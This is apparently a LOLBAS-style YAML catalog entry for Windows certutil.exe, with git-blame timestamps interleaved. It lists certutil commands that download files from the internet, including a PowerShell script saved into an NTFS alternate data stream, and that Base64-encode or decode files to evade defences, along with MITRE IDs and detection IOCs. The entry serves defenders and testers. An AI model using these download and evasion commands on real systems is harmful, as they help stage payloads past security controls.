2018-06-09 00:15:06 +02:00
|
|
|
---
|
|
|
|
Name: Certutil.exe
|
2018-09-24 01:50:14 +02:00
|
|
|
Description: Windows binary used for handeling certificates
|
|
|
|
Author: 'Oddvar Moe'
|
2018-06-09 00:15:06 +02:00
|
|
|
Created: '2018-05-25'
|
|
|
|
Commands:
|
|
|
|
- Command: certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
|
|
|
|
Description: Download and save 7zip to disk in the current folder.
|
2018-09-24 01:50:14 +02:00
|
|
|
Usecase: Download file from Internet
|
|
|
|
Category: Download
|
|
|
|
Privileges: User
|
|
|
|
MitreID: T1105
|
|
|
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
|
|
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
2018-09-24 23:18:00 +02:00
|
|
|
- Command: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
|
2018-06-09 00:15:06 +02:00
|
|
|
Description: Download and save a PS1 file to an Alternate Data Stream (ADS).
|
2018-09-24 01:50:14 +02:00
|
|
|
Usecase: Download file from Internet and save it in an NTFS Alternate Data Stream
|
2018-09-26 09:34:01 +02:00
|
|
|
Category: ADS
|
2018-09-24 01:50:14 +02:00
|
|
|
Privileges: User
|
|
|
|
MitreID: T1105
|
|
|
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
|
|
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
2018-09-24 23:18:00 +02:00
|
|
|
- Command: certutil -encode inputFileName encodedOutputFileName
|
2018-09-24 01:50:14 +02:00
|
|
|
Description: Command to encode a file using Base64
|
|
|
|
Usecase: Encode files to evade defensive measures
|
|
|
|
Category: Encode
|
|
|
|
Privileges: User
|
|
|
|
MitreID: T1027
|
|
|
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1027
|
|
|
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
2018-09-24 23:18:00 +02:00
|
|
|
- Command: certutil -decode encodedInputFileName decodedOutputFileName
|
2018-09-24 01:50:14 +02:00
|
|
|
Description: Command to decode a Base64 encoded file.
|
|
|
|
Usecase: Decode files to evade defensive measures
|
|
|
|
Category: Decode
|
|
|
|
Privileges: User
|
|
|
|
MitreID: T1140
|
|
|
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1140
|
|
|
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
2018-06-09 00:15:06 +02:00
|
|
|
Full Path:
|
2018-09-24 21:59:43 +02:00
|
|
|
- Path: C:\Windows\System32\certutil.exe
|
|
|
|
- Path: C:\Windows\SysWOW64\certutil.exe
|
2018-09-24 01:50:14 +02:00
|
|
|
Code Sample:
|
2018-09-24 23:18:00 +02:00
|
|
|
- Code:
|
2018-09-24 01:50:14 +02:00
|
|
|
Detection:
|
2018-09-24 23:18:00 +02:00
|
|
|
- IOC: Certutil.exe creating new files on disk
|
|
|
|
- IOC: Useragent Microsoft-CryptoAPI/10.0
|
|
|
|
- IOC: Useragent CertUtil URL Agent
|
2018-06-09 00:15:06 +02:00
|
|
|
Resources:
|
2018-09-24 01:50:14 +02:00
|
|
|
- Link: https://twitter.com/Moriarty_Meng/status/984380793383370752
|
|
|
|
- Link: https://twitter.com/mattifestation/status/620107926288515072
|
|
|
|
Acknowledgement:
|
|
|
|
- Person: Matt Graeber
|
|
|
|
Handle: '@mattifestation'
|
|
|
|
- Person: Moriarty
|
|
|
|
Handle: '@moriarty2016'
|
|
|
|
---
|